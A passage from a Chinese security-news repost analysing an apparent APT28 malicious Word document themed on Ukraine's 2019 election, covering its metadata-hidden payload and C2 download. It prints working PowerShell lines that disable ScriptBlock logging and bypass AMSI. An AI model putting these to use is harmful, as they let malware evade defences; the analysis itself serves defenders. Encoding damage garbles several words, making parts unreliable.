奥运会网球比分规则|雪缘网网球比分直播|
欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

风云再起,APT28或将搅局乌克兰大选

来源:本站整理 作者:佚名 时间:2019-04-16 TAG: 我要投稿

3月中旬,一份有关乌克兰总统大选的可疑Office文件在野外出现。这份文件讲述了乌克兰大选民调的情况,以及对领跑候选人Volodymyr Zelenskiy的人生经历做了介绍,此外,该文件还用?#25605;?#19968;个引人注目的标题,指出了乌克兰和俄罗斯之间的冲突问题。调查后发现,这篇文章?#23548;?#19978;?#20405;?#25509;复制了Daily Express于今年2月份发表的一篇文章。

图1.恶意文档示意
文档的主题以及检测到的时间点都引起了我们的注意,因此我们决定进一步挖掘,?#20113;?#20272;这个恶意文档的性质。
技术分析


图2:查看和修改文档上的宏所需的密码
恶意文档的第一个特性是受保护的宏,当用户试图读取它时,会立即显示一个要求输入密码的消息框。使用传统的恶意软件分析工具可以轻松绕过此Office密码保护机制,在提取代码之后,可以按如下方式分析纯文本代码。

图3:文档宏的源代码
乍一看,代码没有被混淆的痕迹,但是可以在宏中发现异常的函数调用:ActiveDocument.BuiltInDocumentProperties.Item(“Company”)。此方法能?#25351;?#23646;于文档元数据的属性。在特定情况下,代码会试图读取“Company”属性中包含的值,一个base64编码的字符串。

图4:存储在文档元数据的“Company”标签中的payload
这种通过在文档属性部分中隐藏恶意payload的做法是Emotet银行恶意软件的惯用手段,Emotet是对全世界组织机构最具侵略性的恶意软件威胁之一。与初始代码不同,解码后的payload是高度混淆的Powershell命令。

图5:从base64到ascii转换后的powershell代码
经过几个去混淆阶段后的代码如下:

图6:去混淆后的powershell代码
这个脚本非常有趣,因为它的第一个动作就是减少自身存在痕迹,此步动作是通过禁用Powershell脚本块日志记录和反软件扫描接口(anti – alware Scan Interface, AMSI)来实现的。
ScriptBlock的日志记录功能是在Powershell v5中引入的,它能够在Powershell引擎执行代码块时对代码块进行日志记?#36857;?#21253;括混淆的代码段和相应的去混淆代码段。而AMSI是一种通用的接口标?#36857;?#23427;允许应用程序和服务与安装在机器上的任何反恶意软件产品集成,并在代码执行之前评估代码。关于AMSI的更多细节已经在以前的分析报告中描述过。
因此,此恶意软件会检查当前的Powershell版本,如果版本是3或在3之上,则会禁用上述安全功能。对上述两项功能的绕过是使用几行代码实现的,比如可以通过以下指令禁用ScriptBlock日志记?#36857;?br/> 1. $settings = [Ref].Assembly.GetType(“System.Management.Automation.Utils”).GetField(“cachedGroupPolicySettings”,”NonPublic,Static”).GetValue($null);
2. $settings[“HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging”] = @{}
3. $settings[“HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging”].Add(“EnableScriptBlockLogging”, “0”)
而绕过AMSI的代码则更简单:
1. [Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true)
该指令能够修改“amsiInitFailed”变量的值,将其设置为“true”。这样,当“ScanContent”方法使用此变量来?#33539;ˋMSI是否应该扫描要执行的命令时,它会返回值amsi_result_not_detection,并让payload运行。从手法上看,恶意软件背后的创作者似乎参考了这篇文章中对AMSI和BlockLogging禁用技术的研究。
在偷偷设置好InternetExplorer 11 的用户代理之后,payload会尝?#28304;?ldquo;hxxps://functiondiscovery[.]net:8443/admin/get”处下载下一个感染阶段所需文件。此代码还包含了Powershell Empire特征指示器:cookie“session = J + kcj5bWE11g4zBLrjvZjNO296I =”。

图7:恶意软件设置的用户代理
C2最后定位为捷克共和国。该IP在2018年10月首次出现,并一直活跃到2019年4月。

图8:关于DropURL/C2的信息

[1] [2]  下一页

【声明】:黑吧安全网(http://www.nddver.tw)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和?#20113;?#30495;实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱[email protected],我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类?#35753;?/li>
        • 最近下载
        奥运会网球比分规则